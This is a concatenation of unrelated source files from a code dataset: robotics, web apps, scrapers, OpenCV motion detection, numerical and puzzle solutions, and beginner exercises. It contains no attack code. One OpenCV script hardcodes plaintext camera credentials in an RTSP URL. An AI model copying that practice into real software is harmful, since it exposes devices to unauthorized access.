__move_forward(self):\r\n# if self.__locked:\r\n# return\r\n self.__log_data['action'] = 'down_start'\r\n self.__moving = True\r\n self.__event_callback(action='down', type='key_down')\r\n #asyncio.sleep(0.3)\r\n #self.__event_callback(action='up', type='key_up')\r\n\r\n @asyncio.coroutine\r\n def __turn_left(self):\r\n if self.__locked:\r\n return\r\n self.__log_data['action'] = 'left_start'\r\n yield from self.log()\r\n self.__locked = True\r\n self.__event_callback(action='left', type='key_down')\r\n yield from asyncio.sleep(0.15)\r\n self.__event_callback(action='left', type='key_up')\r\n self.__log_data['action'] = 'left_end'\r\n self.__locked = False\r\n\r\n @asyncio.coroutine\r\n def __turn_right(self):\r\n if self.__locked:\r\n return\r\n self.__log_data['action'] = 'right_start'\r\n yield from self.log()\r\n self.__locked = True\r\n self.__event_callback(action='right', type='key_down')\r\n yield from asyncio.sleep(0.15)\r\n self.__event_callback(action='right', type='key_up')\r\n self.__log_data['action'] = 'right_end'\r\n self.__locked = False\r\n","sub_path":"follow_strategy.py","file_name":"follow_strategy.py","file_ext":"py","file_size_in_byte":3331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"420694013","text":"# Copyright 2013 National Technology & Engineering Solutions of Sandia, LLC (NTESS). \n# Under the terms of Contract DE-NA0003525 with NTESS, the U.S. Government \n# retains certain rights in this software.\n#\n# This code does the actual parsing of csv files and matrix files\n# for VideoSwarm.\n#\n# S. Martin\n# 5/20/2018\n\nimport cherrypy\nimport csv\nimport numpy\n\n# this version can handle either a matrix of floats, or a vector of strings\ndef parse_mat_file(file):\n\n \"\"\"\n parses out a csv file into numpy array by column (data), the dimension meta data(dimensions),\n and sets attributes (attributes)\n :param file: csv file to be parsed\n :returns: attributes, dimensions, data\n \"\"\"\n\n cherrypy.log.error(\"Started VS generic matrix parser.\")\n\n # parse file using comma delimiter\n rows = [row for row in csv.reader(file.splitlines(), delimiter=\",\", doublequote=True,\n escapechar=None, quotechar='\"', quoting=csv.QUOTE_MINIMAL, skipinitialspace=True)]\n\n # fill a numpy matrix with matrix from file (assumes floats, uses strings otherwise)\n data = numpy.zeros((len(rows[0:]), len(rows[0])))\n string_data = []\n is_float = True\n for j in range(len(rows[0:])):\n try:\n data[j,:] = numpy.array([float(name) for name in rows[j]])\n except:\n is_float = False\n string_data.append([name for name in rows[j]])\n\n # set dimensions according to what was in the file\n dimensions = [dict(name=\"row\", end=int(data.shape[0])),\n dict(name=\"column\", end=int(data.shape[1]))]\n\n # attributes are the same for matrices and vectors\n if is_float:\n attributes = [dict(name=\"value\", type=\"float64\")]\n else:\n attributes = [dict(name=\"value\", type=\"string\")]\n data = string_data\n\n # for debugging:\n # cherrypy.log.error (str(data))\n # cherrypy.log.error (str(dimensions))\n # cherrypy.log.error (str(attributes))\n\n return attributes, dimensions, data","sub_path":"web-server/plugins/slycat-video-swarm/vs-parse-files.py","file_name":"vs-parse-files.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"286331471","text":"# Using redirect route instead of simple routes since it supports strict_slash\n# Simple route: http://webapp-improved.appspot.com/guide/routing.html#simple-routes\n# RedirectRoute: http://webapp-improved.appspot.com/api/webapp2_extras/routes.html#webapp2_extras.routes.RedirectRoute\nfrom webapp2_extras.routes import RedirectRoute\n\nfrom controllers import pages\nimport utils\n\n\n\nsecure_scheme = 'https'\n\n_routes = [\n\n RedirectRoute('/kelly', pages.KellyPage, name='Kelly', strict_slash=True),\n]\n\ndef get_routes():\n return _routes\n\n\ndef add_routes(app):\n if app.debug:\n secure_scheme = 'http'\n for r in _routes:\n app.router.add(r)\n","sub_path":"routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"301065197","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 1 15:59:31 2019\n\n@author: lncl2\n\"\"\"\n# Less time taking 0.0933988094329834\n# good background subtraction\n\n\nimport numpy as np\nimport cv2 as cv\nimport imutils\nimport time\n\ncap = cv.VideoCapture('rtsp://admin:admin123@192.168.1.5:554/Streaming/Channels/901')\nfgbg = cv.createBackgroundSubtractorMOG2()\n\n(major_ver, minor_ver, subminor_ver) = (cv.__version__).split('.')\nif int(major_ver) < 3 :\n fps = cap.get(cv.cv.CV_CAP_PROP_FPS)\n print (\"Frames per second using video.get(cv2.cv.CV_CAP_PROP_FPS): {0}\".format(fps))\nelse :\n fps = cap.get(cv.CAP_PROP_FPS)\n print (\"Frames per second using video.get(cv2.CAP_PROP_FPS) : {0}\".format(fps))\n #fps = fps//1 \n\nwhile(1):\n num_frames = fps;\n start = time.time()\n ret, frame = cap.read()\n fgmask = fgbg.apply(frame)\n text = \"Unoccupied\"\n \n #kernel = np.ones((5,5),np.uint8)\n kernel = cv.getStructuringElement(cv.MORPH_ELLIPSE,(3,3))\n opening = cv.morphologyEx(fgmask, cv.MORPH_OPEN, kernel)\n closing = cv.morphologyEx(opening, cv.MORPH_CLOSE, kernel)\n dilation = cv.dilate(closing,kernel,iterations = 1)\n end = time.time()\n \n seconds = end - start\n \n print (\"Time taken : {0} seconds\".format(seconds))\n\n # Calculate frames per second\n fps = num_frames / seconds;\n print (\"Estimated frames per second : {0}\".format(fps))\n \n \n \n cnts = cv.findContours(dilation.copy(), cv.RETR_EXTERNAL,cv.CHAIN_APPROX_SIMPLE)\n cnts = imutils.grab_contours(cnts)\n \n for c in cnts:\n cv.createBackgroundSubtractorMOG2()\n if cv.contourArea(c) < 1000:\n \n continue\n (x, y, w, h) = cv.boundingRect(c)\n cv.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)\n text = \"Occupied\"\n \n \n cv.putText(frame, \"Roocv.createBackgroundSubtractorMOG()m Status: {}\".format(text), (10, 20),cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2) \n a = cv.resize(dilation, ( 600, 800 ), interpolation = cv.INTER_CUBIC)\n b = cv.resize(frame, (600, 800 ), interpolation = cv.INTER_CUBIC)\n cv.imshow('Contour', b)\n cv.imshow('frame',a)\n \n if text==\"Occupied\":\n \n print (\"Motion detected\")\n else:\n print(\"No motion detected\")\n \n k = cv.waitKey(30) & 0xff\n if k == 27:\n break\ncap.release()\ncv.destroyAllWindows()\n\n\n\n\n## With status Occupied and Unoccupied MOG2\n","sub_path":"backgraound_subtraction/mog2_frame_time.py","file_name":"mog2_frame_time.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"100928579","text":"from PyQt5.QtWidgets import (QWidget, QLabel, QLineEdit,\n QTextEdit, QGridLayout, QApplication, QPushButton,\n QHBoxLayout, QVBoxLayout, QFrame, QSplitter)\nfrom PyQt5.QtGui import QIcon, QFont, QPainter, QColor, QPen\nfrom PyQt5.QtCore import Qt, QRect\nfrom FactoryView import FactoryView\n\nclass MainWindow(QWidget):\n\n def __init__(self, parent = None):\n\n QWidget.__init__(self, parent)\n self.initUI()\n\n\n def initUI(self):\n\n left = QFrame(self)\n right = FactoryView(self)\n\n left.setFrameShape(QFrame.StyledPanel)\n right.setFrameShape(QFrame.StyledPanel)\n\n splitter1 = QSplitter(Qt.Horizontal)\n splitter1.addWidget(left)\n splitter1.addWidget(right)\n\n\n\n hbox1 = QHBoxLayout(self)\n hbox2 = QHBoxLayout(right)\n\n # factoryFloor = FactoryView(parent=right)\n\n hbox1.addWidget(splitter1)\n # hbox2.addWidget(factoryFloor)\n self.setLayout(hbox1)\n # right.setLayout(hbox2)\n\n self.setGeometry(300, 300, 400, 220)\n self.setWindowTitle('Tempo Factory Simulator')\n self.setWindowIcon(QIcon('res/tempo_automation_logo.png'))\n self.show()\n\n","sub_path":"MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"202961770","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 17-9-10 上午8:37\n# @Author : huiqin\n# @File : Interleaving.py\n# @Description : Class is for\n\nclass Solution(object):\n def isInterleave(self, s1, s2, s3):\n \"\"\"\n :type s1: str\n :type s2: str\n :type s3: str\n :rtype: bool\n \"\"\"\n if len(s1)+len(s2) != len(s3): return False\n\n dp = [[False for i in range(len(s2)+1)] for j in range(len(s1)+1)]\n dp[0][0] = True\n\n for i in range(1,len(s1)+1):\n dp[i][0] = dp[i-1][0] and s1[i-1]==s3[i-1]\n\n for j in range(1,len(s2)+1):\n dp[0][j] = dp[0][j-1] and s2[j-1]==s3[j-1]\n\n for i in range(1,len(s1)+1):\n for j in range(1,len(s2)+1):\n dp[i][j] = (dp[i-1][j] and s3[i+j-1]==s1[i-1]) or (dp[i][j-1] and s3[i+j-1]==s2[j-1])\n return dp[len(s1)][len(s2)]\n","sub_path":"CoreProgramming/DynamicPropgramming/Interleaving.py","file_name":"Interleaving.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"397087","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport usuarios.models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('usuarios', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='diarista',\n name='comprovante',\n field=models.ImageField(default='diaristas/comprovante/', upload_to=usuarios.models.PathAndRename('/home/felipe/cleanup/media/diaristas/comprovante'), verbose_name='Comprovante de Resid\\xeancia'),\n ),\n migrations.AlterField(\n model_name='diarista',\n name='cpfoto',\n field=models.ImageField(default='diaristas/cpf/', upload_to=usuarios.models.PathAndRename('/home/felipe/cleanup/media/diaristas/cpf'), verbose_name='CPF'),\n ),\n migrations.AlterField(\n model_name='diarista',\n name='rgfoto',\n field=models.ImageField(default='diaristas/rg/', upload_to=usuarios.models.PathAndRename('/home/felipe/cleanup/media/diaristas/rg'), verbose_name='RG'),\n ),\n ]\n","sub_path":"usuarios/migrations/0002_auto_20170617_2332.py","file_name":"0002_auto_20170617_2332.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"429796997","text":"import wpilib\nfrom commandbased import CommandBasedRobot\n\nimport subsystems\n\nfrom commands.autonomous.autonomous import Autonomous\nfrom commands.gear.closegear import CloseGear\n\nimport operatorinput\n\nimport robotmap\n\n'''import network tables in order to setup network tables for\ncommunicating with camera process'''\n\nfrom networktables import NetworkTables\n\n# NetworkTables.initialize(server='roborio-2036-frc.local')\n\n\nclass Robot(CommandBasedRobot):\n \"\"\"Robot program base framework.\n\n Overridden init and periodic methods are called at appropriate\n times automatically.\n \"\"\"\n\n def robotInit(self):\n \"\"\"Robot initiializer. Initializes things such as all of the subsystems\n and operator input objects.\n\n Runs once during startup.\n \"\"\"\n subsystems.init()\n operatorinput.init()\n\n self.autonomous = Autonomous()\n\n \"\"\"Launch the child process for obtaining centroids of the\n vision targets. See the documentation in camera.py and at\n http://robotpy.readthedocs.io/en/stable/vision/roborio.html\"\"\"\n\n wpilib.CameraServer.launch('camera.py:main')\n\n print(\"Initialized robot\")\n\n def autonomousInit(self):\n \"\"\"Prepares the code for the autonomous period.\n \"\"\"\n CloseGear().start()\n\n self.autonomous.start()\n\n print(\"Autonomous initialized\")\n\n def autonomousPeriodic(self):\n \"\"\"Periodic code for the autonomous period.\n\n Called every 20ms or so.\n \"\"\"\n wpilib.command.Scheduler.getInstance().run()\n\n def teleopInit(self):\n \"\"\"Prepares the code for the tele-operated period.\n\n Runs once when remote control is activated\n \"\"\"\n self.autonomous.cancel()\n\n print(\"Tele-op initialized.\")\n\n def teleopPeriodic(self):\n \"\"\"Periodic code for the tele-operated period.\n\n Called every 20ms or so.\n \"\"\"\n wpilib.command.Scheduler.getInstance().run()\n\nif __name__ == '__main__':\n wpilib.run(Robot)\n","sub_path":"robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"100825704","text":"\ndef main():\n st=set()\n y,x=0,0\n st.add((0,0))\n s=input()\n k=int(input())\n prev_update=0\n prev=0\n rem=0\n for ki in range(k):\n for si in s:\n if si=='L':x-=1\n if si=='R':x+=1\n if si=='U':y+=1\n if si=='D':y-=1\n st.add((y,x))\n cnt=len(st)\n update=cnt-prev\n prev=cnt\n if update==prev_update:\n rem=k-ki-1\n break\n prev_update=update\n\n ans=len(st)+prev_update*rem\n print(ans)\n\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"1_contest/current/abc219/f.py","file_name":"f.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"579816690","text":"import sys\n# import time\n\nimport os\nfrom selenium import webdriver\nfrom bs4 import BeautifulSoup, NavigableString # required for HTML and XML parsing # required for HTML and XML parsing: pip install beautifulsoup4\n\n\nchrome_options = webdriver.ChromeOptions()\nchrome_options.add_argument('--headless')\nchrome_options.add_argument('--no-sandbox')\nchrome_options.add_argument('--disable-dev-shm-usage')\ndriver = webdriver.Chrome(executable_path=r'C:\\Users\\olegs\\Desktop\\gsoc_publisher\\chromedriver_win32\\chromedriver.exe',options=chrome_options)\n\n\nissues_url = \"https://github.com/deepmipt/DeepPavlov/issues\"\n\ndriver.get(issues_url)\nhtmlSource = driver.page_source\n\nnextSoups = []\nfor pageNum in range(10):\n driver.get(issues_url+f\"?page={pageNum}\")\n htmlSource2 = driver.page_source\n soup2 = BeautifulSoup(htmlSource2, features=\"html.parser\")\n nextSoups.append(soup2)\n\nsoup = BeautifulSoup(htmlSource, features=\"html.parser\")\ncontent_html = soup.find(\"div\", attrs={\"class\": \"repository-content\"})\n\ne = soup.find(\"div\", attrs={\"class\": \"bg-gray-light pt-3 hide-full-screen mb-5\"})\nif e:\n e.extract()\ne = soup.find(\"div\", attrs={\"class\": \"position-relative js-header-wrapper \"})\nif e:\n e.extract()\ne = soup.find(\"div\", attrs={\"class\": \"position-relative js-header-wrapper\"})\nif e:\n e.extract()\ne = soup.find(\"div\", attrs={\"class\": \"js-pinned-issues-reorder-container\"})\nif e:\n e.extract()\ne = soup.find(\"div\", attrs={\"class\": \"paginate-container d-none d-sm-flex flex-sm-justify-center\"})\nif e:\n e.extract()\ne = soup.find(\"div\", attrs={\"class\": \"footer container-xl width-full p-responsive\"})\nif e:\n e.extract()\ne = soup.find(\"div\", attrs={\"class\": \"protip\"})\nif e:\n e.extract()\ne = soup.find(\"div\", attrs={\"class\": \"paginate-container d-sm-none mb-5\"})\nif e:\n e.extract()\ne = soup.find(\"div\", attrs={\"class\": \"Box-header d-flex flex-justify-between\"})\nif e:\n e.extract()\ne = soup.find(\"div\", attrs={\"class\": \"ml-2 pl-2 d-none d-md-flex\"})\nif e:\n e.extract()\ne = soup.find(\"div\", attrs={\"class\": \"ml-3 d-flex flex-justify-between width-full width-md-auto\"})\nif e:\n e.extract()\n\nc3s = []\nfor soup2 in nextSoups:\n for c in soup2.findAll(\"div\", attrs={\"aria-label\": \"Issues\"}):\n # print(type(c))\n for c2 in c.findAll(\"div\", attrs={\"class\": \"js-navigation-container js-active-navigation-container\"}):\n for c3 in c2.children:\n c3s.append(c3)\n\n\nfor c3 in c3s:\n soup.find(\"div\", \n attrs={\"class\": \"js-navigation-container js-active-navigation-container\"})\\\n .append(c3)\n # print(c3)\n\nsoup_pretty = str(soup)\n\nsoup_pretty = soup_pretty.replace('\"/deepmipt/DeepPavlov/issues', '\"https://github.com/deepmipt/DeepPavlov/issues')\nsoup_pretty = soup_pretty.replace('\"/users', '\"https://github.com/users')\n\nimport os\nos.makedirs(\"_includes\", exist_ok=True)\nwith open(\"_includes/gsoc_ideas.html\", 'w', encoding=\"utf-8\") as f:\n print(soup_pretty, file=f)\n\n","sub_path":"generate_ideas.py","file_name":"generate_ideas.py","file_ext":"py","file_size_in_byte":3032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"254249540","text":"\"\"\"\nHolds global web application state and the WSGI handler.\n\nYou can run this script for a one-process webapp.\n\nFurther, you can pass in ``--check`` which will create the app and then exit\nmaking it easier to suss out startup and configuration issues.\n\n\"\"\"\n\nimport logging\nimport sys\n\nfrom waitress import serve\n\nfrom ichnaea.webapp.config import main, shutdown_worker\n\n\nLOGGER = logging.getLogger(\"ichnaea\")\n\n\n# Internal module global holding the runtime web app.\n_APP = None\n\n\ndef wsgi_app(environ, start_response):\n \"\"\"\n Actual WSGI application endpoint, used on the command line via:\n\n .. code-block:: bash\n\n bin/gunicorn -c python:ichnaea.webapp.gunicorn_settings \\\n ichnaea.webapp.app:wsgi_app\n\n At startup reads the app config and calls\n :func:`ichnaea.webapp.config.main` once to setup the web app stored\n in the :data:`ichnaea.webapp.app._APP` global.\n \"\"\"\n global _APP\n\n if _APP is None:\n _APP = main(ping_connections=True)\n if environ is None and start_response is None:\n # Called as part of gunicorn's post_worker_init\n return _APP\n\n return _APP(environ, start_response)\n\n\ndef worker_exit(server, worker):\n shutdown_worker(_APP)\n\n\ndef log_access_factory(wsgi_app):\n \"\"\"WSGI middleware for logging HTTP requests.\"\"\"\n\n def handle(environ, start_response):\n method = environ[\"REQUEST_METHOD\"]\n path = environ.get(\"PATH_INFO\", \"\")\n\n def log_response(status, headers, exc_info=None):\n content_length = \"\"\n for key, val in headers:\n if key.lower() == \"content-length\":\n content_length = \"(%s)\" % val\n break\n LOGGER.info(\"%s %s - %s %s\", method, path, status, content_length)\n return start_response(status, headers, exc_info)\n\n return wsgi_app(environ, log_response)\n\n return handle\n\n\nif __name__ == \"__main__\":\n if \"--check\" in sys.argv:\n main(ping_connections=False)\n else:\n serve(\n log_access_factory(main(ping_connections=True)), host=\"0.0.0.0\", port=8000\n )\n","sub_path":"ichnaea/webapp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"182079572","text":"#w=int(input(\"enter\"))\n#s=0\n#while w>0:\n#\ts=s+w;\n#\tw=w-2;\n#print(s)\n#fibbo\ndef fibonacci(n):\n\tif(n<=1):\n\t\treturn n\n\telse:\n\t\treturn(fibonacci(n-1)+fibonacci(n-2))\nn=int(input(\"netre no of terms:\"))\nprint(\"fib series\")\nfor i in range(n):\n\tprint(fibonacci(i))\n","sub_path":"Series.py","file_name":"Series.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"598712233","text":"import PyPDF2\nimport glob\nimport datetime\n\n\ndef mergePDF(filesArr, result_filename):\n pdfFileObjArray = []\n for i in filesArr:\n pdfFileObj = PyPDF2.PdfFileReader(open(i, \"rb\"))\n pdfFileObjArray.append(pdfFileObj)\n pdfWriter = PyPDF2.PdfFileWriter()\n for i in pdfFileObjArray:\n for j in range(i.numPages):\n pdfWriter.addPage(i.getPage(j))\n pdfOutputFile = open(\"./MERGED DOCS HERE/\"+result_filename, 'wb')\n pdfWriter.write(pdfOutputFile)\n pdfOutputFile.close()\n\n\nif __name__ == \"__main__\":\n PdfArr = glob.glob('./DROP/*.pdf')\n print(\"{} Files found!!\".format(len(PdfArr)))\n x = {}\n for i in range(len(PdfArr)):\n x[chr(i+97)] = PdfArr[i]\n for i, j in x.items():\n print(i, \":\", j.split(\"\\\\\")[1])\n temp = []\n y = input(\n \"Enter letters of files to merge in required order(space seperated):\").lower().split()\n for i in y:\n temp.append(x.get(i))\n inp = input(\"Name the Merged File:\").replace(\" \", \"-\")\n result_filename = inp+\".pdf\"\n mergePDF(temp, result_filename)\n print(\"Hogaya Bhai,Hogaya Done!\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"20841297","text":"import numpy as np\n\n\nfrom openmdao.api import ExplicitComponent\n\n\nclass KKTComp(ExplicitComponent):\n\n def initialize(self):\n self.options.declare('NDOF', types=int)\n # self.options.declare('NEL', types=int)\n self.options.declare('A', types = np.ndarray)\n self.options.declare('f', types = np.ndarray)\n self.options.declare('constraints', types = np.ndarray)\n\n\n\n def setup(self):\n NDOF = self.options['NDOF']\n # NEL = self.options['NEL']\n constraints = self.options['constraints']\n self.add_input('Kglobal', shape=(NDOF, NDOF))\n self.add_output('K_temp', shape = (NDOF + len(constraints),NDOF + len(constraints)))\n self.add_output('f_temp', shape = (NDOF + len(constraints)))\n # self.declare_partials('d', 'Kglobal', method ='fd')\n col_ind = np.arange(NDOF*NDOF)\n # for rows\n arange = np.arange(NDOF)\n rows = np.tile(arange, NDOF)\n cols = np.repeat(arange, NDOF)\n row_ind = np.block([[rows], [cols]])\n row_ind = np.ravel_multi_index(row_ind, (NDOF + len(constraints),NDOF + len(constraints)))\n self.declare_partials('K_temp', 'Kglobal', val=1., rows=row_ind, cols=col_ind)\n\n\n def compute(self, inputs, outputs):\n A = self.options['A']\n f = self.options['f']\n constraints = self.options['constraints']\n nc = len(constraints)\n Kglobal = inputs['Kglobal']\n\n outputs['K_temp'] = np.block([[Kglobal, A.T],[A, np.zeros((nc,nc))]])\n outputs['f_temp'] = np.append(f, constraints)\n","sub_path":"FEA-solver/KKT_comp.py","file_name":"KKT_comp.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"633532675","text":"\"\"\"\nO Código deve realizar a criação de uma prova com cinco. perguntas (para simular escrevar qualquer coisa que tenha\nresposta sim ou nao, cada pergunta pode ter duas respostas.\nSe o Aluno escolher sim o questionario deve somar 2 pontos.\nO Aluno, caso contrario nao deve somar, ao final o sistema deve mostrar o total da nota alcanda pelo aluno\n\"\"\"\n\n\n\n\nnm = input(\"Digite o nome do Aluno: \").title()\n\nprint(\"\\nA Capital do Paraná é CURITIBA?\")\npr1 = str(input(\"\\n***** Digite [SIM] ou [NAO] *****\\n\\t\\t\").upper())\nif pr1 == 'SIM':\n r1 = 2\nelse:\n r1 = 0\nprint(\"\\n SEGUNDA PERGUNTA! VALENDOOOOOO!\")\nprint(\"\\nUma pais da Europa! Essa Frase foi dita pelo FAUSTAO?\")\npr2 = str(input(\"***** Digite [SIM] ou [NAO] *****\\n\\t\\t\").upper())\nif pr2 == 'SIM':\n r2 = 2\nelse:\n r2 = 0\n\n\nprint(\"\\n TERCEIRA PERGUNTA!!! VALENDOOOOO!!!\")\nprint(\"\\nTá pegando Fogo Bicho! - Essa frase foi dita pelo Gugu?\")\npr3 = str(input(\"***** Digite [SIM] ou [NAO] *****\\n\\t\\t\").upper())\nif pr3 == 'NAO':\n r3 = 2\nelse:\n r3 = 0\n\nprint(\"\\nQuarta pergunta! VALEEEEENDOOOOO!\")\nprint(\"\\nA Turma B de TDS, é a melhor do Portão?\")\npr4 = str(input(\"***** Digite [SIM] ou [NAO] *****\\n\\t\\t\").upper())\nif pr4 == 'NAO':\n r4 = 2\nelse:\n r4 = 0\n\nsoma = r1+r2+r3+r4\n\nprint(\"\\n\\nOlá {}. A Soma da Pontuação é {}\".format(nm, soma))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"AulaSenai24.py","file_name":"AulaSenai24.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"638904786","text":"import re\n\nff = open('8.txt')\n\nrealc = 0\nmemc = 0\n\n# def parse(line):\n# line = line.strip()\n# line = line[1:-1]\n# line = line.replace('\\\\\\\\','b')\n# line = line.replace('\\\\\"','q')\n# line = re.sub('\\\\\\\\x.','',line)\n# return line\n\n# for line in ff.readlines():\n# line = line.strip()\n# reel = line\n# mem = parse(line)\n# realc += len(reel)\n# memc += len(mem)\n# print (\"%s %d %s %d\" % (reel,len(reel),mem,len(mem)))\n\ndef parse(line):\n line = line.strip()\n line = line.replace('\\\\','bb')\n line = line.replace('\"','bq')\n line = '\"' + line + '\"'\n return line\n\nfor line in ff.readlines():\n line = line.strip()\n reel = line\n mem = parse(line)\n realc += len(reel)\n memc += len(mem)\n print (\"%s %d %s %d\" % (reel,len(reel),mem,len(mem)))\n\n# print(parse(\"ucrmjvmimmcq\\x88\\xd9\\\"lz\"))\n# print(parse(\"srgost\\\"\\\"rbkcqtlccu\\x65ohjptstrjkzy\"))\n\n# print(real('''\"d\\\\\"\"'''))\n# print(mem('''\"d\\\\\"\"'''))\n\nprint (realc)\nprint (memc)\nprint (memc - realc)\n","sub_path":"Dropbox/adventofcode/8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"243857702","text":"# 8-12. Sandwiches: Write a function that accepts a list of items a person wants on a sandwich. The function should have one parameter that collects as many items as the function call provides, and it should print a summary of the sandwich that is being ordered. Call the function three times, using a different number of arguments each time.\n\ndef make_sandwich(*sandwiches):\n print('\\nThis are the sandwiches that we have: ')\n for sandwich in sandwiches:\n print(\"-\" + sandwich)\n\nmake_sandwich('tuna')\nmake_sandwich('tuna','pastrami')\nmake_sandwich('blt', 'pastrami', 'cheese')","sub_path":"chapter_08/chapter_8_8_12.py","file_name":"chapter_8_8_12.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"259113805","text":"# 🚨 Don't change the code below 👇\r\njahr = int(input(\"Which jahr do you want to check? \"))\r\n# 🚨 Don't change the code above 👆\r\n\r\n#Write your code below this line 👇\r\n\r\nif jahr % 4 == 0 and jahr % 100 != 0:\r\n print(\"Schaltjahr.\")\r\nelif jahr % 4 == 0 and jahr % 100 == 0:\r\n if jahr % 400 == 0:\r\n print(\"Schaltjahr.\")\r\n else:\r\n print(\"Kein Schaltjahr.\")\r\nelse:\r\n print(\"Kein Schaltjahr.\")","sub_path":"Leap_Year_Calculator.py","file_name":"Leap_Year_Calculator.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"545729796","text":"from requests import get\nfrom datetime import date\nfrom lxml import html\nimport re\n\n# Requirements on rpm-based systems:\n# yum install libxslt-devel libxml2-devel python-devel\n# pip install requests lxml cssselect\n\n# Optionally, if your system has low amount of RAM, the installation of\n# lxml may fail with \"gcc: internal compiler error: Killed (program cc1)\".\n# In that case, install the \"python-lxml\" and \"python-cssselect\" packages\n# with Yum:\n# yum install python-lxml\n\n# Lunchtime:\n# \"http://www.lunchtime.cz/podnik/\" + restaurant code below\nlunchtime = {\"paladeo\" : \"4088-paladeo-restaurante\", \"kotelna\" : \"1427-u-kotelny\"}\n\ndef scrapeLunchTime(restaurant):\n \"\"\"\n Scrape menus from restaurants that have RSS feeds on lunchtime.cz\n \"\"\"\n # GET the entire website that displays the menu\n response = get(\"http://www.lunchtime.cz/podnik/\" + restaurant)\n\n # Convert string in response to HTML that can be parsed with cssselect\n tree = html.fromstring(response.text)\n\n # Get the menu from div with class .daily-menu-item-list\n menu = tree.cssselect(\".daily-menu-item-list\")\n\n # Return the first match\n return html.tostring(menu[0])\n\n# Rebio:\n# CZ - http://www.rebio.cz/Rebio-Park/gn.workroom.aspx\n\ndef scrapeRebio():\n \"\"\"\n Scrape menu from Rebio Park restaurant\n \"\"\"\n # GET the entire website that displays the menu\n response = get(\"http://www.rebio.cz/Rebio-Park/gn.workroom.aspx\")\n\n # Convert string in response to HTML that can be parsed with cssselect\n tree = html.fromstring(response.text)\n\n # Get the h3 that holds the menu for today\n h3 = tree.cssselect(\".h-today-special.r-image\")\n\n # Return the next element of the h3 found in previous step\n # that is the
      that holds the menu, also encoded in UTF-8\n return html.tostring(h3[0].getnext())#.encode('utf-8').strip()\n\ndef scrapeKanas():\n \"\"\"\n Scrapu menu from kanas.cz\n \"\"\"\n # Get today's date to construct link for today's menu\n day = date.today().strftime(\"%Y/%-m/%-d\")\n response = get(\"http://www.kanas.cz/stranka/date/\" + day)\n tree = html.fromstring(response.text)\n\n # Get the restaurant's menu, which is placed under tab1\n restaurant_menu = tree.cssselect(\"#tab1\")\n menu = html.tostring(restaurant_menu[0])\n\n # Get the cafeteria's menu, which is placed under tab2\n cafeteria_menu = tree.cssselect(\"#tab2\")\n menu += html.tostring(cafeteria_menu[0])\n\n # Scraping kanas.cz returns two-byte ISO encoding; only manually\n # converting it to UTF-8 works (no idea how to do this with some Python\n # encoding magic)\n menu = menu.replace(\"Á\",\"Á\") # Capital A, acute\n menu = menu.replace(\"á\",\"á\") # Small a, acute\n menu = menu.replace(\"ÄŒ\",\"Č\") # Capital C, caron\n menu = menu.replace(\"č\",\"č\") # Small c, caron\n # menu = menu.replace(\"\",\"Ď\") # Capital D, caron\n menu = menu.replace(\"ď\",\"ď\") # Small d, caron\n # menu = menu.replace(\"\",\"É\") # Capital E, acute\n menu = menu.replace(\"é\",\"é\") # Small e, acute\n # menu = menu.replace(\"\",\"Ě\") # Capital E, caron\n menu = menu.replace(\"Ä›\",\"ě\") # Small e, caron\n # menu = menu.replace(\"\",\"Í\") # Capital I, acute\n menu = menu.replace(\"í\",\"í\") # Small i, 